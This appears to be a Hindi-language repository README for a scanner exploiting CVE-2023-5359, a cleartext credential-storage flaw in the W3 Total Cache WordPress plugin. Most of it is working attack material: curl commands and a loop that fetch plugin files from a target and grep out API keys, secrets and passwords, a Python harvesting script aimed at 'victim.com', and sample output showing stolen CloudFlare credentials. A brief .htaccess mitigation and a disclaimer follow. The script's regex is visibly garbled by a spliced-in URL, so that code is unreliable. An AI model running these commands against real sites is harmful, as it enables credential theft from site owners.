
CVE-2023-5359 - W3 Total Cache स्पष्ट पाठ भंडारण भेद्यता स्कैनर. W3 Total Cache प्लगइन संस्करण ≤ 2.7.5 में उजागर क्रेडेंशियल्स का पता लगाएं.
CVE-2023-5359 एक क्लियरटेक्स्ट स्टोरेज भेद्यता है जो वर्डप्रेस प्लगइन W3 Total Cache के संस्करण ≤ 2.7.5 को प्रभावित करती है। यह भेद्यता दूरस्थ हमलावरों को संवेदनशील क्रेडेंशियल्स तक पहुंचने की अनुमति देती है जो अनएन्क्रिप्टेड PHP फाइलों में संग्रहीत होते हैं और सार्वजनिक रूप से सुलभ होते हैं।
W3 Total Cache कॉन्फ़िगरेशन सेटिंग्स और API क्रेडेंशियल्स को /wp-content/plugins/w3-total-cache/ निर्देशिका के अंदर PHP फाइलों में पर्याप्त सुरक्षा के बिना संग्रहीत करता है। ये फ़ाइलें HTTP के माध्यम से सुलभ हैं, जिससे निम्नलिखित का पता चलता है:
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"
# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"
# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
echo "=== $file ==="
curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
#!/usr/bin/env python3
import requests
import re
target = "https://victim.com"
files = [
"/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
"/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]
for file in files:
response = requests.get(target + file)
credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
if credentials:
print(f"[!] Credentials found in {file}:")
for key, value in credentials:
print(f" {key}: {value}")
एक हमलावर प्राप्त कर सकता है:
# .htaccess protection
<Files *.php>
Deny from all
</Files>
<Files "w3-total-cache.php">
Allow from all
</Files>
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
client_id: GAxxxxxxxxxxxx78
client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इस जानकारी का दुर्भावनापूर्ण उपयोग सख्त वर्जित है।
क्या आपको यह जानकारी उपयोगी लगी? रिपॉजिटरी को स्टार करें!
अंतिम अद्यतन: नवंबर 2025